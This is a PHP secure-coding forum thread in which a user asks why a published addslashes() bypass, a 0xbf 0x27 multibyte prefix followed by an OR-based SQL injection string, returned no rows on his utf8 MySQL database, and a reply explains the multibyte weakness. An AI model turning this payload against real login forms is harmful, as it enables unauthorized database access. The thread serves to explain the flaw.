How is this code not secure ?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
goldensparrow
Forum Commoner
Posts: 30
Joined: Wed Jun 17, 2009 3:31 am

How is this code not secure ?

Post by goldensparrow »

i visited chris'web and i saw his code

Code: Select all

 
<?php
 
$mysql = array();
 
 
 
/* SQL Injection Example */
$_POST['username'] = chr(0xbf) .
                     chr(0x27) .
                     ' OR username = username /*';
$_POST['password'] = 'guess';
 
$mysql['username'] = addslashes($_POST['username']);
$mysql['password'] = addslashes($_POST['password']);
 
$sql = "SELECT *
        FROM   users
        WHERE  username = '{$mysql['username']}'
        AND    password = '{$mysql['password']}'";
 
echo $sql ;
 
?>
 
 
i've tried to test that code and echo sql variable , it print that

Code: Select all

SELECT * FROM users WHERE username = '¿\' OR username = username /*' AND password = 'guess'

i copied this sql command to run in phpmyadmin but it return result is 0 row, that is attacker cannot access my database
question is why did my database return result 0 row when i ran this code ? or can you describe this code

thanks in advance
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: How is this code not secure ?

Post by kaisellgren »

The injection works just fine. Addslashes() is not a multi-byte character safe function and has never been meant to be used to prevent SQL injections. I think any multi-byte character ending in 0x5c could be used to inject a single quote.

Maybe you do not have a users table with a column username or MySQL was running in ANSI mode where /* should be invalid I think.
goldensparrow
Forum Commoner
Posts: 30
Joined: Wed Jun 17, 2009 3:31 am

Re: How is this code not secure ?

Post by goldensparrow »

sorry kai , the code which you saw is wrong ,i copied missing and here is the actual code

SELECT * FROM users WHERE username = '?\' OR username = username /*' AND password = 'guess'

table users is existing in my database and charset is utf8

it seem my database tired to search user field = "?\' OR username = username /*" and password = "guess" , so it returned 0 row

what i want to know is why this sql injection method cannot access my database?

thanks and sorry for my missing information
User avatar
kaisellgren
DevNet Resident
Posts: 1675
Joined: Sat Jan 07, 2006 5:52 am
Location: Lahti, Finland.

Re: How is this code not secure ?

Post by kaisellgren »

The code you pasted previously has a question mark (0x3f) and an escape character (0x5c). This is will not bypass addslashes(). You need to use characters outside the ASCII range to achieve the results you want. In the first post you used 0xbf, which is not in the ASCII range and works well.
Post Reply